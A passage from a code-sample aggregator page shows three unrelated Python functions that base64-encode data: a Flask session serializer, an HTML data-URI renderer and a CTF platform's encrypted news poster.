    datetimes become single-key dictionaries (keys ``' t'``, ``' u'``,
    ``' b'``, ``' m'`` and ``' d'``); lists and dictionaries are tagged
    recursively; ``str`` values are converted with ``text_type``. Any other
    value is returned unchanged.

    The checks run in a fixed order, so the first matching type wins.
    """
    if isinstance(value, tuple):
        return {' t': list(map(_tag, value))}
    if isinstance(value, uuid.UUID):
        return {' u': value.hex}
    if isinstance(value, bytes):
        return {' b': b64encode(value).decode('ascii')}
    if callable(getattr(value, '__html__', None)):
        return {' m': text_type(value.__html__())}
    if isinstance(value, list):
        return list(map(_tag, value))
    if isinstance(value, datetime):
        return {' d': http_date(value)}
    if isinstance(value, dict):
        return dict((key, _tag(item)) for key, item in iteritems(value))
    if isinstance(value, str):
        try:
            return text_type(value)
        except UnicodeError:
            from flask.debughelpers import UnexpectedUnicodeError
            raise UnexpectedUnicodeError(u'A byte string with '
                u'non-ASCII data was passed to the session system '
                u'which can only store unicode strings.  Consider '
                u'base64 encoding your string (String was %r)' % value)
    return value
terminal.py 文件源码 项目:TerminalView 作者: Wramberg 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def html(self):
        """
        Renders :attr:`self.file_obj` through one of the HTML templates with
        the src set to a base64 data URI.

        Returns an empty string when there is no file object. The link
        points at the original file's name when one is set, otherwise at
        :attr:`self.path`; the icon template is used when a thumbnail is
        set.
        """
        if not self.file_obj:
            return u""

        # A data URI needs the content base64 encoded, read from the start.
        self.file_obj.seek(0)
        b64_text = base64.b64encode(self.file_obj.read()).decode('utf-8')
        data_uri = "data:{mimetype};base64,{encoded}".format(
            mimetype=self.mimetype, encoded=b64_text)

        link = "%s/%s" % (self.linkpath, os.path.basename(self.path))
        if self.original_file:
            original_name = os.path.basename(self.original_file.name)
            link = "%s/%s" % (self.linkpath, original_name)

        fields = dict(link=link, src=data_uri, mimetype=self.mimetype)
        if self.thumbnail:
            return self.html_icon_template.format(icon=self.thumbnail, **fields)
        return self.html_template.format(**fields)
news.py 文件源码 项目:PTE 作者: pwn2winctf 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def add(self, msg_text, to=None):
        """Append a news message, save, and push the change.

        Without ``to`` the message text is stored as given. With ``to`` the
        text is sealed with that team's ``crypt_pk`` key and stored base64
        encoded together with the recipient name. The commit message names
        the recipient, or ``all`` when there is none.
        """
        current_time = int(time.time())
        if to is not None:
            team_pk = Team(name=to)['crypt_pk']
            sealed = pysodium.crypto_box_seal(msg_text.encode("utf-8"),
                                              team_pk)
            message = {"msg": b64encode(sealed).decode("utf-8"),
                       "to": to,
                       "time": current_time}
        else:
            message = {"msg": msg_text, "time": current_time}

        self.append(message)
        self.save()

        dest = message.get("to", "all")
        SubRepo.push(commit_message='Added news to %s' % dest,
                     merge_request=False)


问题


面经


文章

微信
公众号

扫码关注公众号